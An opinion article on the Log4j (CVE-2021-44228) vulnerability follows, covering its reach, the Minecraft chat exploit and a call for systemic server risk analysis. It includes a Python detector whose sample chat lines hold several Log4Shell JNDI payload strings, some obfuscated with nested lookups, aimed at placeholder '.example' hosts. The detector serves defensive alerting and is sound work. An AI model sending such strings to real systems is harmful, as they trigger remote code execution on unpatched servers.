The Log4j bug (CVE-2021-44228) is considered a major global vulnerability by security analysts. It lies in a Java logging library used on servers, and it allows remote code execution on servers and on client home computers.
In terms of who uses it, this logging library is close to universal, including governments and corporations. Equally problematic, the bug is directly tied to the ubiquitous and highly regarded open-source Apache suite of server software.
It’s big enough to be called “a threat to the internet” by NSA Cybersecurity Director Rob Joyce. Exploit code was posted online, adding more possible actors and more risk.
It’s also apparently enough of a problem that Microsoft, Apple, and Valve have not yet responded to media inquiries. Traditionally, this uncharacteristic reticence means “we’re working on it”.
A very unkind first hit for this bug was on the huge gaming platform Minecraft. To exploit it there, all attackers had to do was post a string in the chat box; the logging process presumably did the rest. Minecraft has since provided a fix.
(Ars Technica reports that the fix requires a manual install.)
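The Minecraft case above shows why the chat text itself is the thing to watch: Log4j 2 treats `${...}` in a logged message as a lookup to resolve. As an added example (not the page's own code, and not Minecraft's or Apache's), this detector scans constructed chat-log lines for the `${jndi:...}` lookup behind CVE-2021-44228, first collapsing the `${lower:...}`/`${upper:...}`/`${...:-default}` nesting that defeats a naive string match. The sample lines and the `.example` hostnames are constructed.

```python
import re

# Innermost Log4j 2 lookup: a ${...} with no nested '${' inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The dangerous lookup prefix behind CVE-2021-44228.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Collapse one innermost lookup the way Log4j would, for the disguising cases only."""
    body = match.group(1)
    if ":-" in body:                      # ${missing:-default} resolves to 'default'
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return value.lower()
    if sep and prefix.strip().lower() == "upper":
        return value.upper()
    return match.group(0)                 # leave every other lookup intact for matching


def normalize(text: str, max_passes: int = 8) -> str:
    """Repeatedly collapse nested case/default lookups so a disguised 'jndi' reappears."""
    for _ in range(max_passes):
        collapsed = INNER_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, contains a JNDI lookup."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return the lines a defender should alert on."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed sample chat log, not real traffic.
SAMPLE_LINES = [
    "2021-12-10 12:00:01 <player1> anyone want to trade diamonds?",
    "2021-12-10 12:00:07 <player2> ${jndi:ldap://lookup-host.example/a}",
    "2021-12-10 12:00:09 <player3> ${${lower:j}ndi:${lower:l}dap://lookup-host.example/a}",
    "2021-12-10 12:00:11 <player4> ${${::-j}${::-n}${::-d}${::-i}:rmi://lookup-host.example/b}",
    "2021-12-10 12:00:15 <player5> cost is ${price} gold, ok?",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print("ALERT:", hit)
```

Matching on logged text is a stopgap for alerting only; it does not replace updating the library so lookups are no longer resolved.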
The bigger problem: not enough strategic risk analysis and prediction, but a possible benefit, too.
Rather than be wise after the event, let’s try being wise before the next one, shall we?
Let’s also try to get some value out of the current mess:
This widely distributed server software is a gigantic, predictable target. It would be a natural target during a war, for example, able to trash any number of systems with ease.
This vulnerability will get people looking for other easy-access options after this one is fixed. The need is to identify possible candidates now, not when the next problem happens.
This is a comparatively low-tech risk, amplified by scale. When someone breaks into a house, the way they got in is less of an issue than what happens when they get in. The problem is less the bug than its range of reach and scope of possible applications. This bug simply allows access. Such a lower-level threat may not be a high priority in security management, and that’s part of the problem.
Analysis of access capabilities for software should be the core metric for risk assessment. Whatever else this bug does, it makes a very serious point. It doesn’t matter what the software is; if it is at all capable of reaching anywhere and accessing everything, it is a possible major threat by definition. The good news here is that this very basic perspective, as pedantic as it has to be, can do the job of broad-scope threat identification.
Vulnerable servers aren’t exactly new. Why has it taken so long, after so many cases, to recognize the need for a reliable overwatch for servers? There’s only so much people can do on the ground when things happen. I had to fight off a live, onsite-listing-itself homemade DIY botnet attack manually, and it took forever. I was literally working on the dashboard, with no support available while the thing kept spamming away, trashing the site every second. Through the server, if I’d been able to do it, I could have shut it off a lot quicker.
Where are all the cyber heroes? Hacking is so easy (a few characters can do it) and yet cyber security seems to be uninterested in simply setting up “no execute” regimes for any fluff that blows in online. I’ve seen code execute through a site search inquiry myself. How is that secure? Why is it so easy?
This is one of the few all-on-the-same-page security issues where major players like Microsoft, Apple, Apache, and Valve can achieve a lot, fast. Whatever the fix, it needs to be systemic, preventing the movement of bugs through servers. Any “no go” will do, as long as it works. Take the problem out of the hands of the security do-nothings and give it to the experts to fix. It could also help general security and prevent the spread of malware.